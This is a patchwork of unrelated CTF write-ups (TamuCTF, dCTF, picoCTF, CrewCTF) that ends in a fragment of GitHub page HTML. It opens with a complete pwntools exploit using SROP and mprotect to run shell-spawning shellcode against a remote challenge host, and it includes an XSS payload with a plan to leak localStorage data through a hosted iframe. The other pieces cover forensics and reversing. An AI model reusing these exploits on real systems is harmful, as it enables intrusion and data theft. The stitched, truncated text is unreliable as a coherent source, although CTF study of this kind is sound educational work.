## Solution I didn't solve this one during TamuCTF but I saw ```sky#0004```'s [solve in Discord](https://discord.com/channels/962465945882853407/965296241846145114/965322156965761054) and went back and relooked at the problem with the benefit of their solution. I based my solution largely on their approach. I had been stuck on the fact that I needed to call ```sys_mprotect``` to enable RWX permissions. Since there was a ```syscall, ret```, I was hopeful I might be able to ```pop sys_rt_sigreturn (0xf) into rax```, use SROP to call ```sys_mprotect```, and set the ```rdi, rsi, rdx``` registers . However, there were no gadgets to write to rax. I made the mistake of not realizing that ```sys_read``` would return the bytes read into rax. After figuring that out, putting the exploit together is pretty straightforward. First make ```sys_read``` syscall to set rax=0xf. Next, use SROP for ```sys_mprotect``` and mark the address of the shellcode as RWX. Return in the program's entry, adjust the stack, and execute the shellcode. ```pythonfrom pwn import *import time binary = args.BIN context.terminal = ["tmux", "splitw", "-h"]e = context.binary = ELF(binary)r = ROP(e) gs = '''break *0x401018continue''' def start(): if args.GDB: return gdb.debug(e.path, gdbscript=gs) elif args.REMOTE: return remote("tamuctf.com", 443, ssl=True, sni="void") else: return process(e.path) p = start() '''0x401000: mov rax, 0; mov rdi, 0; mov rsi, rsp; mov rdx, 0x7d0; syscall; rax = sys_read, rdi = fd = stdin, rsi = char* = 'rsp', rdx = len = 0x7d40 '''sys_read = 0x401000 '''0x401018: syscall; ret'''syscall_ret = 0x401018 start = 0x400020 entry = 0x400018 '''stack_adjust + shellcode '''shellcode = asm('add rsp,0x68')shellcode += asm(shellcraft.sh()) def pause(stage): print("[+] Pausing Before Sending Stage: %s" %stage) if args.GDB: raw_input("[+] Press [Enter] To Send") else: time.sleep(0.1) def srop_mprotect(): chain = p64(sys_read) chain += p64(syscall_ret) '''sys_mprotect(rdi=start,rsi=len(shellcode),rdx=prot=RWX)''' frame = SigreturnFrame() frame.rip = syscall_ret frame.rsp = entry frame.rax = constants.SYS_mprotect frame.rdi = e.address frame.rsi = len(shellcode) frame.rdx = 7 p.send(chain + bytes(frame)) def read_15_bytes(): pause("Reading 15 Bytes (rax=0xf=sys_rt_sigreturn) ") chain=p64(syscall_ret).ljust(constants.SYS_rt_sigreturn) p.send(chain) def exec_shellcode(): pause("Shellcode") p.send(p64(start) + shellcode) srop_mprotect()read_15_bytes()exec_shellcode() p.interactive()``` Running the exploit returns the flag ```python3 pwn-void.py BIN=./void REMOTE[*] '/root/workspace/tamu-ctf/void/void' Arch: amd64-64-little RELRO: No RELRO Stack: No canary found NX: NX enabled PIE: No PIE (0x400000)[*] Loaded 2 cached gadgets for './void'[+] Opening connection to tamuctf.com on port 443: Done[+] Pausing Before Sending Stage: Reading 15 Bytes (rax=0xf=sys_rt_sigreturn) [+] Pausing Before Sending Stage: Shellcode[*] Switching to interactive mode$ cat flag.txtgigem{1_6u355_7h475_h0w_w3_3xpl017_17}``
### Original writeup **[https://github.com/Samik081/ctf-writeups/blob/master/dCTF%2022/misc/corrupt_company.md](https://github.com/Samik081/ctf-writeups/blob/master/dCTF%2022/misc/corrupt_company.md)** ## Corrupt Company (200 points) ### DescriptionA whistleblower from Best Company Ever inc. sent us this corrupt file that may be containing incriminating data. Help him find the proof of company's evil plans! ### File analysisWe are given `nothing.jpg` file. Typically, in this case, I would start with `binwalk`: ```console$ binwalk nothing.jpg DECIMAL HEXADECIMAL DESCRIPTION--------------------------------------------------------------------------------0 0x0 JPEG image data, JFIF standard 1.0130 0x1E TIFF image data, big-endian, offset of first image directory: 828768 0x7060 Zip archive data, at least v2.0 to extract, name: secret/28805 0x7085 Zip archive data, at least v2.0 to extract, compressed size: 50122, uncompressed size: 53337, name: secret/Business plan.docx79022 0x134AE Zip archive data, at least v2.0 to extract, compressed size: 77, uncompressed size: 627, name: secret/.h/not_important.txt```So, there's a `.docx` file and **apparently not important** `not_important.txt` archive file. Let's extract the latter and analyze it: ### Extraction of the flag content ```console$ dd bs=1 skip=79022 if=nothing.jpg of=flag.zip 134+0 records in134+0 records out134 bytes copied, 0.0350347 s, 3.8 kB/s $ zipdetails flag.zipNo Central Directory records found``` Looks like the ZIP archive is broken. ### Fixing the ZIP archive Let's try to repair it using `zip -FF` and try to get the flag:```console$ zip -FF flag.zip --out repaired_flag.zip Fix archive (-FF) - salvage what can zip warning: Missing end (EOCDR) signature - either this archive is not readable or the end is damagedIs this a single-disk archive? (y/n): y Assuming single-disk archiveScanning for entries... copying: secret/.h/not_important.txt (77 bytes) $ unzip repaired_flag.zipArchive: repaired_flag.zipsecret/.h/not_important.txt: ucsize 627 <> csize 77 for STORED entry continuing with "compressed" size value extracting: secret/.h/not_important.txt bad CRC 08d3bdbd (should be fd4cb455) $ cat secret/.h/not_important.txt ?,VHIUy%?E%y%z\C??V]c?_eX?oX?_n?oR???)??&y?`?``` You can already notice `bad CRC` error and that we get some binary data instead of plain text flag. Let's analyze the repaired zip: ```console $ zipdetails repaired_flag.zip 0000 LOCAL HEADER #1 04034B500004 Extract Zip Spec 14 '2.0'0005 Extract OS 00 'MS-DOS'0006 General Purpose Flag 00000008 Compression Method 0000 'Stored'000A Last Mod Time 548C6643 'Tue Apr 12 12:50:06 2022'000E CRC FD4CB4550012 Compressed Length 0000004D0016 Uncompressed Length 00000273001A Filename Length 001B001C Extra Length 0000001E Filename 'secret/.h/not_important.txt'0039 PAYLOAD ...,VH..IU..y.%.....E%.y%z.\C.*....\.V]. c._eX.oX._n.oR......).....&y.....`... 0086 CENTRAL HEADER #1 02014B50008A Created Zip Spec 00 '0.0'008B Created OS 00 'MS-DOS'008C Extract Zip Spec 14 '2.0'008D Extract OS 00 'MS-DOS'008E General Purpose Flag 00000090 Compression Method 0000 'Stored'0092 Last Mod Time 548C6643 'Tue Apr 12 12:50:06 2022'0096 CRC FD4CB455009A Compressed Length 0000004D009E Uncompressed Length 0000027300A2 Filename Length 001B00A4 Extra Length 000000A6 Comment Length 000000A8 Disk Start 000000AA Int File Attributes 0000 [Bit 0] 0 'Binary Data'00AC Ext File Attributes 0000000000B0 Local Header Offset 0000000000B4 Filename 'secret/.h/not_important.txt' 00CF END CENTRAL HEADER 06054B5000D3 Number of this disk 000000D5 Central Dir Disk no 000000D7 Entries in this disk 000100D9 Total Entries 000100DB Size of Central Dir 0000004900DF Offset to Central Dir 0000008600E3 Comment Length 0000``` At this point, we should notice following lines: ```console0000 LOCAL HEADER #1 04034B500008 Compression Method 0000 'Stored'0012 Compressed Length 0000004D0016 Uncompressed Length 00000273...0086 CENTRAL HEADER #1 02014B500090 Compression Method 0000 'Stored'009A Compressed Length 0000004D009E Uncompressed Length 00000273``` Apparently, data is compressed - we could not read the file, got bad CRC and the Compressed and Uncompressed Length values differ. However, the compression method is set to `0x00` which means, there's no compression. This looks like the broken part, so let's try to fix it. I will assume the strongest compression first (`8`). To do this, we are going to change the compression byte for the **Local file header** from `0x00` to `0x08` using some hex editor or bash command:```console$ printf '\x08' | dd of=repaired_flag.zip bs=1 seek=$((0x08)) count=1 conv=notrunc 1+0 records in1+0 records out1 byte copied, 0.000863 s, 1.2 kB/s``` Let's try to unzip and get the flag now:```console$ unzip repaired_flag.zip && cat secret/.h/not_important.txtArchive: repaired_flag.zip inflating: secret/.h/not_important.txtThis file is not important. ( ... lots of whitespaces ... ) dctf{pl5_z1p_1t_w3_4r3_4_g00d_c0mp4ny}```
TLDR (full writeup @ [https://www.nullhardware.com/reference/hacking-101/picoctf-2022-greatest-hits/live-art/](https://www.nullhardware.com/reference/hacking-101/picoctf-2022-greatest-hits/live-art/)): 1. With your browser window **really** small, goto `/drawing/abcd#src=1&onerror=alert(1)&is`. You'll get an "error" page telling you your window is small.2. Internally it will create an object from the hash parameters `{src: 1, onerror: 'alert(1)', is: ''}`, this object will be stored as part of the react state.3. Now resize your window so it is big and you should get an alert popup. The previous state is being re-used in the wrong context (*NOTE: in development mode, react spits out a bunch of error messages when you resize the page*).4. Observe that the state variable is now directly used as the attributes for an image tag. *NOTE*: Normally react doesn't let you set the onerror attribute - you'd be required to use `onError` attribute where the value *must* be a function (not a string). However, the presence of the `is` attribute aborts that code-path (some webcomponent thing, found that trick here: https://ethanwu.dev/blog/2021/07/14/redpwn-ctf-2021-md-bin/).5. You write a webpage to load the above page (with a payload to leak the value of `localStorage.username`) in an iframe and then programmatically resize the iframe. This page must be publically hosted, and it must be on port 80 or 443.
# Safe Opener Author: MUBARAK MIKAIL *Reverse Engineering*, 100 Points ## Description```Can you open this safe?I forgot the key to my safe but this program is supposed to help me with retrieving the lost key. Can you help me unlock my safe?Put the password you recover into the picoCTF flag format like:picoCTF{password}``` ## SolutionOpening the Java program, we get the code of the program. ```javaimport java.io.*;import java.util.*; public class SafeOpener { public static void main(String args[]) throws IOException { BufferedReader keyboard = new BufferedReader(new InputStreamReader(System.in)); Base64.Encoder encoder = Base64.getEncoder(); String encodedkey = ""; String key = ""; int i = 0; boolean isOpen; while (i < 3) { System.out.print("Enter password for the safe: "); key = keyboard.readLine(); encodedkey = encoder.encodeToString(key.getBytes()); System.out.println(encodedkey); isOpen = openSafe(encodedkey); if (!isOpen) { System.out.println("You have " + (2 - i) + " attempt(s) left"); i++; continue; } break; } } public static boolean openSafe(String password) { String encodedkey = "cGwzYXMzX2wzdF9tM18xbnQwX3RoM19zYWYz"; if (password.equals(encodedkey)) { System.out.println("Sesame open"); return true; } else { System.out.println("Password is incorrect\n"); return false; } }}```Taking a closer look at the program, we see the following lines that look interesting (not together in code):```javaBase64.Encoder encoder = Base64.getEncoder(); encodedkey = encoder.encodeToString(key.getBytes()); // This is where the input is encoded. String encodedkey = "cGwzYXMzX2wzdF9tM18xbnQwX3RoM19zYWYz"; // This key is the encoded password that the encoded input is checked against. ```From `Base64.Encoder encoder = Base64.getEncoder();` and `encodedkey = encoder.encodeToString(key.getBytes());`, we can tell input encoded to base 64 before it is compared to the encoded password. Thus, `cGwzYXMzX2wzdF9tM18xbnQwX3RoM19zYWYz`, is simply the correct password but encoded in Base 64, and decoding it using an online decoder gives us `pl3as3_l3t_m3_1nt0_th3_saf3`. Putting the password in the flag format, we get `picoCTF{pl3as3_l3t_m3_1nt0_th3_saf3}` which is the correct flag. Hooray! `picoCTF{pl3as3_l3t_m3_1nt0_th3_saf3}`
# Eavesdrop Author: LT 'SYREAL' JONES / MUBARAK MIKAIL *Forensics*, 300 Points Tags: *pcap* ## Description```Download this packet capture and find the flag. • Download packet capture``` ## Hints- All we know is that this packet capture includes a chat conversation and a file transfer. ## Solution This problem is actually quite simple if you are well acquainted with using Wireshark. Opening the challenge file in Wireshark, we can quickly see that there is a conversation between 10.0.2.4 and 10.0.2.15 on the TCP protocol. From here, we can easily deduce that we are supposed to "eavesdrop" on the conversation. By right clicking on a random TCP packet transfer, going to follow and following the TCP stream, we see the following conversation: ![Conversation](https://github.com/yanganyi/writeup-picoctf-2022/raw/main/Forensics/Eavesdrop/Images/Conversation.png) From here, we can immediately see that the command to decrypt the ciphertext is `openssl des3 -d -salt -in file.des3 -out file.txt -k supersecretpassword123` We can also expect to see a file transfer somewhere between "Yeah, listening." and "Sent it". Exiting the TCP stream and examining all the packets in between, we see data transmitted over TCP that begins with "Salted__". It is likely the ciphertext that we are looking for as the ciphertext decrypt command has `-salt` in it. ![Ciphertext](https://github.com/yanganyi/writeup-picoctf-2022/raw/main/Forensics/Eavesdrop/Images/Ciphertext.png) From here, we can just select the packet and export its data by going to `File -> Export Packet Bytes` and saving it as raw packets. Renaming the ciphertext file to file.des3, we can just run the command givend directly to decrypt it, thus getting the flag. ![Export](https://github.com/yanganyi/writeup-picoctf-2022/raw/main/Forensics/Eavesdrop/Images/Export.png)However, please take note that for this step, you **cannot** just right click on the data in wireshark and copy as printable text as not all hex characters convert to printable characters so doing so will give you the wrong ciphertext. `picoCTF{nc_73115_411_77b05957}`
We have Corrupted.001 file without any extension.When we try to figure out what is this using `file Corrupted.001` we just get 'data' instead of file type.So, let's open it with Ghex ![](https://raw.githubusercontent.com/kperevoznikova/writeups/main/CrewCTF%202022/pics/corrupted1.png) We see a lot of trash before a valid NTFS-header `EB 52 90 4E 54 46 ...`. We just delete this bytes and save files as "Corrupted". Next, mount it using `ntfs-3g` and see a flag inside a directory with pictures: ![](https://raw.githubusercontent.com/kperevoznikova/writeups/main/CrewCTF%202022/pics/corrupted2.png)![](https://raw.githubusercontent.com/kperevoznikova/writeups/main/CrewCTF%202022/pics/corrupted3.jpg)
<html lang="en" data-color-mode="auto" data-light-theme="light" data-dark-theme="dark" data-a11y-animated-images="system"> <head> <meta charset="utf-8"> <link rel="dns-prefetch" href="https://github.githubassets.com"> <link rel="dns-prefetch" href="https://avatars.githubusercontent.com"> <link rel="dns-prefetch" href="https://github-cloud.s3.amazonaws.com"> <link rel="dns-prefetch" href="https://user-images.githubusercontent.com/"> <link rel="preconnect" href="https://github.githubassets.com" crossorigin> <link rel="preconnect" href="https://avatars.githubusercontent.com"> <link crossorigin="anonymous" media="all" rel="stylesheet" href="https://github.githubassets.com/assets/light-fe3f886b577a.css" /><link crossorigin="anonymous" media="all" rel="stylesheet" href="https://github.githubassets.com/assets/dark-a1dbeda2886c.css" /><link data-color-theme="dark_dimmed" crossorigin="anonymous" media="all" rel="stylesheet" data-href="https://github.githubassets.com/assets/dark_dimmed-1ad5cf51dfeb.css" /><link data-color-theme="dark_high_contrast" crossorigin="anonymous" media="all" rel="stylesheet" data-href="https://github.githubassets.com/assets/dark_high_contrast-11d3505dc06a.css" /><link data-color-theme="dark_colorblind" crossorigin="anonymous" media="all" rel="stylesheet" data-href="https://github.githubassets.com/assets/dark_colorblind-8b800495504f.css" /><link data-color-theme="light_colorblind" crossorigin="anonymous" media="all" rel="stylesheet" data-href="https://github.githubassets.com/assets/light_colorblind-daa38c88b795.css" /><link data-color-theme="light_high_contrast" crossorigin="anonymous" media="all" rel="stylesheet" data-href="https://github.githubassets.com/assets/light_high_contrast-1b9ea565820a.css" /><link data-color-theme="light_tritanopia" crossorigin="anonymous" media="all" rel="stylesheet" data-href="https://github.githubassets.com/assets/light_tritanopia-e4be9332dd6c.css" /><link data-color-theme="dark_tritanopia" crossorigin="anonymous" media="all" rel="stylesheet" data-href="https://github.githubassets.com/assets/dark_tritanopia-0dcf95848dd5.css" /> <link crossorigin="anonymous" media="all" rel="stylesheet" href="https://github.githubassets.com/assets/primer-c581c4e461bb.css" /> <link crossorigin="anonymous" media="all" rel="stylesheet" href="https://github.githubassets.com/assets/global-0e278d45156f.css" /> <link crossorigin="anonymous" media="all" rel="stylesheet" href="https://github.githubassets.com/assets/github-dcaf0f44dbb1.css" /> <link crossorigin="anonymous" media="all" rel="stylesheet" href="https://github.githubassets.com/assets/wiki-b72b6de22521.css" /> <script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/wp-runtime-774bfe5ae983.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_stacktrace-parser_dist_stack-trace-parser_esm_js-node_modules_github_bro-327bbf-0aaeb22dd2a5.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/ui_packages_soft-nav_soft-nav_ts-21fc7a4a0e8f.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/environment-e059fd03252f.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_github_selector-observer_dist_index_esm_js-2646a2c533e3.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_delegated-events_dist_index_js-node_modules_github_details-dialog-elemen-63debe-c04540d458d4.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_github_relative-time-element_dist_index_js-b9368a9cb79e.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_fzy_js_index_js-node_modules_github_markdown-toolbar-element_dist_index_js-e3de700a4c9d.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_github_auto-complete-element_dist_index_js-node_modules_github_catalyst_-6afc16-e779583c369f.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_github_file-attachment-element_dist_index_js-node_modules_github_text-ex-3415a8-7ecc10fb88d0.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_github_filter-input-element_dist_index_js-node_modules_github_remote-inp-79182d-befd2b2f5880.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_primer_view-components_app_components_primer_primer_js-node_modules_gith-6a1af4-df3bc95b06d3.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/github-elements-fc0e0b89822a.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/element-registry-1641411db24a.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_lit-html_lit-html_js-9d9fe1859ce5.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_manuelpuyol_turbo_dist_turbo_es2017-esm_js-4140d67f0cc2.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_github_mini-throttle_dist_index_js-node_modules_github_alive-client_dist-bf5aa2-424aa982deef.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_primer_behaviors_dist_esm_dimensions_js-node_modules_github_hotkey_dist_-9fc4f4-d434ddaf3207.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_color-convert_index_js-35b3ae68c408.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_github_remote-form_dist_index_js-node_modules_github_session-resume_dist-def857-2a32d97c93c5.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_github_paste-markdown_dist_index_esm_js-node_modules_github_quote-select-15ddcc-1512e06cfee0.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/app_assets_modules_github_updatable-content_ts-430cacb5f7df.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/app_assets_modules_github_behaviors_keyboard-shortcuts-helper_ts-app_assets_modules_github_be-f5afdb-8dd5f026c5b9.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/app_assets_modules_github_sticky-scroll-into-view_ts-0af96d15a250.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/app_assets_modules_github_behaviors_include-fragment_ts-app_assets_modules_github_behaviors_r-4077b4-75370d1c1705.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/app_assets_modules_github_behaviors_commenting_edit_ts-app_assets_modules_github_behaviors_ht-83c235-7883159efa9e.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/behaviors-742151da9690.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_delegated-events_dist_index_js-node_modules_github_catalyst_lib_index_js-06ff531-32d7d1e94817.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/notifications-global-f5b58d24780b.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_morphdom_dist_morphdom-esm_js-node_modules_github_template-parts_lib_index_js-58417dae193c.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_virtualized-list_es_index_js-node_modules_github_memoize_dist_esm_index_js-8496b7c4b809.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_github_clipboard-copy-element_dist_index_esm_js-node_modules_github_remo-8e6bec-232430bfe6da.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_github_mini-throttle_dist_decorators_js-node_modules_scroll-anchoring_di-e71893-cc1b30c51a28.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/app_assets_modules_github_ref-selector_ts-7bdefeb88a1a.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/app_assets_modules_github_diffs_blob-lines_ts-app_assets_modules_github_diffs_linkable-line-n-f96c66-97aade341120.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/diffs-3a64c1f69a81.js"></script> <script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/wiki-1423a5c9ebf5.js"></script> <title>PicoCTF : Sleuthkit Apprentice · not1cyyy/CTF-Writeups Wiki · GitHub</title> <meta name="route-pattern" content="/:user_id/:repository/wiki/:id(.:format)"> <meta name="current-catalog-service-hash" content="27690012a2eb28b75d0bacab0f2c11870266e8db9e019fa71fea812b82397bd6"> <meta name="request-id" content="8144:380B:417EC16:42F5500:64121B8F" data-pjax-transient="true"/><meta name="html-safe-nonce" content="d6075671bf7a760869329c033ceefd78eb11b769d1e6d58c8d4a5eb26327032c" data-pjax-transient="true"/><meta name="visitor-payload" content="eyJyZWZlcnJlciI6IiIsInJlcXVlc3RfaWQiOiI4MTQ0OjM4MEI6NDE3RUMxNjo0MkY1NTAwOjY0MTIxQjhGIiwidmlzaXRvcl9pZCI6IjU2NTA1MjYyMzk3NzkzMzA5NTkiLCJyZWdpb25fZWRnZSI6ImZyYSIsInJlZ2lvbl9yZW5kZXIiOiJmcmEifQ==" data-pjax-transient="true"/><meta name="visitor-hmac" content="d409ef45c3e6c950d79b793f38a49c3da46f8fc2020734426037615e77e4a72a" data-pjax-transient="true"/> <meta name="hovercard-subject-tag" content="repository:481769760" data-turbo-transient> <meta name="github-keyboard-shortcuts" content="repository" data-turbo-transient="true" /> <meta name="selected-link" value="repo_wiki" data-turbo-transient> <meta name="google-site-verification" content="c1kuD-K2HIVF635lypcsWPoD4kilo5-jA_wBFyT4uMY"> <meta name="google-site-verification" content="KT5gs8h0wvaagLKAVWq8bbeNwnZZK1r1XQysX3xurLU"> <meta name="google-site-verification" content="ZzhVyEFwb7w3e0-uOTltm8Jsck2F5StVihD0exw2fsA"> <meta name="google-site-verification" content="GXs5KoUUkNCoaAZn7wPN-t01Pywp9M3sEjnt_3_ZWPc"> <meta name="google-site-verification" content="Apib7-x98H0j5cPqHWwSMm6dNU4GmODRoqxLiDzdx9I"> <meta name="octolytics-url" content="https://collector.github.com/github/collect" /> <meta name="analytics-location" content="/<user-name>/<repo-name>/wiki/show" data-turbo-transient="true" /> <meta name="user-login" content=""> <meta name="viewport" content="width=device-width"> <meta name="description" content="This is my writeups repository ! . Contribute to not1cyyy/CTF-Writeups development by creating an account on GitHub."> <link rel="search" type="application/opensearchdescription+xml" href="/opensearch.xml" title="GitHub"> <link rel="fluid-icon" href="https://github.com/fluidicon.png" title="GitHub"> <meta property="fb:app_id" content="1401488693436528"> <meta name="apple-itunes-app" content="app-id=1477376905" /> <meta name="twitter:image:src" content="https://opengraph.githubassets.com/e171482900f0c3d46b31f49340e572ecc31e0ee3e562f7133c521eed126b0881/not1cyyy/CTF-Writeups" /><meta name="twitter:site" content="@github" /><meta name="twitter:card" content="summary_large_image" /><meta name="twitter:title" content="PicoCTF : Sleuthkit Apprentice" /><meta name="twitter:description" content="This is my writeups repository ! . Contribute to not1cyyy/CTF-Writeups development by creating an account on GitHub." /> <meta property="og:image" content="https://opengraph.githubassets.com/e171482900f0c3d46b31f49340e572ecc31e0ee3e562f7133c521eed126b0881/not1cyyy/CTF-Writeups" /><meta property="og:image:alt" content="This is my writeups repository ! . Contribute to not1cyyy/CTF-Writeups development by creating an account on GitHub." /><meta property="og:image:width" content="1200" /><meta property="og:image:height" content="600" /><meta property="og:site_name" content="GitHub" /><meta property="og:type" content="object" /><meta property="og:title" content="PicoCTF : Sleuthkit Apprentice" /><meta property="og:url" content="https://github.com/not1cyyy/CTF-Writeups/wiki/PicoCTF-:-Sleuthkit-Apprentice" /><meta property="og:description" content="This is my writeups repository ! . Contribute to not1cyyy/CTF-Writeups development by creating an account on GitHub." /> <link rel="assets" href="https://github.githubassets.com/"> <meta name="hostname" content="github.com"> <meta name="expected-hostname" content="github.com"> <meta name="enabled-features" content="TURBO_EXPERIMENT_RISKY,IMAGE_METRIC_TRACKING,GEOJSON_AZURE_MAPS"> <meta http-equiv="x-pjax-version" content="ef97471de14f8d2285f0269e8f0f7dc70845f693d3f6ccd2dd2daae5cd1bbebe" data-turbo-track="reload"> <meta http-equiv="x-pjax-csp-version" content="2a84822a832da97f1ea76cf989a357ec70c85713a2fd8f14c8421b76bbffe38c" data-turbo-track="reload"> <meta http-equiv="x-pjax-css-version" content="adfc12179419e463f9f320d07920b1684c9b7e060d4d9cd3a6cd5d0de37ce710" data-turbo-track="reload"> <meta http-equiv="x-pjax-js-version" content="711646ae23abb27cf728346f30f81c042d4428233a0795acf0e21ed664fe9d94" data-turbo-track="reload"> <meta name="turbo-cache-control" content="no-preview" data-turbo-transient=""> <meta name="go-import" content="github.com/not1cyyy/CTF-Writeups git https://github.com/not1cyyy/CTF-Writeups.git"> <meta name="octolytics-dimension-user_id" content="101048320" /><meta name="octolytics-dimension-user_login" content="not1cyyy" /><meta name="octolytics-dimension-repository_id" content="481769760" /><meta name="octolytics-dimension-repository_nwo" content="not1cyyy/CTF-Writeups" /><meta name="octolytics-dimension-repository_public" content="true" /><meta name="octolytics-dimension-repository_is_fork" content="false" /><meta name="octolytics-dimension-repository_network_root_id" content="481769760" /><meta name="octolytics-dimension-repository_network_root_nwo" content="not1cyyy/CTF-Writeups" /> <meta name="turbo-body-classes" content="logged-out env-production page-responsive"> <meta name="browser-stats-url" content="https://api.github.com/_private/browser/stats"> <meta name="browser-errors-url" content="https://api.github.com/_private/browser/errors"> <meta name="browser-optimizely-client-errors-url" content="https://api.github.com/_private/browser/optimizely_client/errors"> <link rel="mask-icon" href="https://github.githubassets.com/pinned-octocat.svg" color="#000000"> <link rel="alternate icon" class="js-site-favicon" type="image/png" href="https://github.githubassets.com/favicons/favicon.png"> <link rel="icon" class="js-site-favicon" type="image/svg+xml" href="https://github.githubassets.com/favicons/favicon.svg"> <meta name="theme-color" content="#1e2327"><meta name="color-scheme" content="light dark" /> <link rel="manifest" href="/manifest.json" crossOrigin="use-credentials"> </head> <body class="logged-out env-production page-responsive" style="word-wrap: break-word;"> <div data-turbo-body class="logged-out env-production page-responsive" style="word-wrap: break-word;"> <div class="position-relative js-header-wrapper "> Skip to content <span> <span></span></span> <script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_github_remote-form_dist_index_js-node_modules_delegated-events_dist_inde-94fd67-04fa93bb158a.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/sessions-9920eaa99f50.js"></script><header class="Header-old header-logged-out js-details-container Details position-relative f4 py-3" role="banner"> <button type="button" class="Header-backdrop d-lg-none border-0 position-fixed top-0 left-0 width-full height-full js-details-target" aria-label="Toggle navigation"> <span>Toggle navigation</span> </button> <div class="container-xl d-flex flex-column flex-lg-row flex-items-center p-responsive height-full position-relative z-1"> <div class="d-flex flex-justify-between flex-items-center width-full width-lg-auto"> <svg height="32" aria-hidden="true" viewBox="0 0 16 16" version="1.1" width="32" data-view-component="true" class="octicon octicon-mark-github"> <path d="M8 0c4.42 0 8 3.58 8 8a8.013 8.013 0 0 1-5.45 7.59c-.4.08-.55-.17-.55-.38 0-.27.01-1.13.01-2.2 0-.75-.25-1.23-.54-1.48 1.78-.2 3.65-.88 3.65-3.95 0-.88-.31-1.59-.82-2.15.08-.2.36-1.02-.08-2.12 0 0-.67-.22-2.2.82-.64-.18-1.32-.27-2-.27-.68 0-1.36.09-2 .27-1.53-1.03-2.2-.82-2.2-.82-.44 1.1-.16 1.92-.08 2.12-.51.56-.82 1.28-.82 2.15 0 3.06 1.86 3.75 3.64 3.95-.23.2-.44.55-.51 1.07-.46.21-1.61.55-2.33-.66-.15-.24-.6-.83-1.23-.82-.67.01-.27.38.01.53.34.19.73.9.82 1.13.16.45.68 1.31 2.69.94 0 .67.01 1.3.01 1.49 0 .21-.15.45-.55.38A7.995 7.995 0 0 1 0 8c0-4.42 3.58-8 8-8Z"></path></svg> <div class="flex-1"> Sign up </div> <div class="flex-1 flex-order-2 text-right"> <button aria-label="Toggle navigation" aria-expanded="false" type="button" data-view-component="true" class="js-details-target Button--link Button--medium Button d-lg-none color-fg-inherit p-1"> <span> <span><div class="HeaderMenu-toggle-bar rounded my-1"></div> <div class="HeaderMenu-toggle-bar rounded my-1"></div> <div class="HeaderMenu-toggle-bar rounded my-1"></div></span> </span></button> </div> </div> <div class="HeaderMenu--logged-out p-responsive height-fit position-lg-relative d-lg-flex flex-column flex-auto pt-7 pb-4 top-0"> <div class="header-menu-wrapper d-flex flex-column flex-self-end flex-lg-row flex-justify-between flex-auto p-3 p-lg-0 rounded rounded-lg-0 mt-3 mt-lg-0"> <nav class="mt-0 px-3 px-lg-0 mb-3 mb-lg-0" aria-label="Global"> <button type="button" class="HeaderMenu-link border-0 width-full width-lg-auto px-0 px-lg-2 py-3 py-lg-2 no-wrap d-flex flex-items-center flex-justify-between js-details-target" 